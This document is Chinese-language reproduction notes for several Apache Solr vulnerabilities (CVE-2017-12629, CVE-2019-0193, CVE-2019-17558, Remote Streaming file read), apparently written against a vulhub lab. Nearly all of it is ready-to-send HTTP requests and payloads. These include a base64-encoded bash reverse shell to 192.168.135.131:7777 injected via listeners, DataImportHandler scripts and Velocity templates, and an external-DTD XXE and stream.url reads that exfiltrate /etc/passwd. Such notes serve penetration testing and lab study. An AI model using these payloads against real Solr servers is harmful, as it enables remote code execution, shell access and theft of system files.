Solr
1.漏洞复现
CVE-2017-12629-RCE
影响范围:Solr < 7.1、Lucene < 7.1
先用NC监听,POST请求创建Listener(执行新命令要换name)
POST /solr/demo/config HTTP/1.1 Host: 192.168.135.131:8983 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 224 {"add-listener":{"event":"postCommit","name":"name5","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"]}}
POST请求触发所有存在的listener,等一会儿
POST /solr/demo/update HTTP/1.1 Host: 192.168.135.131:8983 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 19 [{"id":"hacker"}]
CVE-2017-12629-XXE
影响范围:Solr < 7.1、Lucene < 7.1
访问主页查看有哪些Cores(demo),路径:http://IP:8983/solr/
准备一个读取文件用的DTD
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY send SYSTEM ':%file;'>">
对XML语句URL编码进行GET请求调用外部实体
<!DOCTYPE xml [<!ENTITY % xxe SYSTEM "http://192.168.135.131/xxe.dtd">%xxe;%remote;]><r>&send;</r>
http://192.168.135.131:8983/solr/demo/select?&q=%3c%21%44%4f%43%54%59%50%45%20%78%6d%6c%20%5b%3c%21%45%4e%54%49%54%59%20%25%20%78%78%65%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%33%35%2e%31%33%31%2f%78%78%65%2e%64%74%64%22%3e%25%78%78%65%3b%25%72%65%6d%6f%74%65%3b%5d%3e%3c%72%3e%26%73%65%6e%64%3b%3c%2f%72%3e&wt=xml&defType=xmlparser
CVE-2019-0193
影响范围:Solr < 8.2.0,并且开启了 DataImportHandler 模块
如果是vulhub靶场,要先创建一个Core
docker-compose exec solr bash bin/solr create_core -c demo -d example/example-DIH/solr/db
访问主页查看有哪些Cores(demo),路径:http://IP:8983/solr/
Dataimport->debug->Debug-Mode
Configuration输入框内容替换为Payload
<dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"); } ]]></script> <document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" /> </document> </dataConfig>
先用NC监听,点击蓝色 Execute with this Configuration → 反弹shell
CVE-2019-17558
影响范围:Solr 5.0.0 - 8.3.1
访问主页查看有哪些Cores(demo),路径:http://IP:8983/solr/
POST请求将params.resource.loader.enabled设为true
POST /solr/demo/config HTTP/1.1 Host: 192.168.135.131:8983 Content-Type: application/json Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
先用NC监听,GET请求反弹shell
反弹shell命令要全部URL编码,bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}
/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27反弹shell%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
Remote-Streaming-Fileread 任意文件读取
影响范围:Solr <= 8.8.1
访问主页查看有哪些Cores(demo),路径:http://IP:8983/solr/
POST请求开启 demo 的 RemoteStreaming
POST /solr/demo/config HTTP/1.1 Host: 192.168.135.131:8983 Content-Type: application/json Content-Length: 88 { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true} }
GET请求任意文件读取,/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd
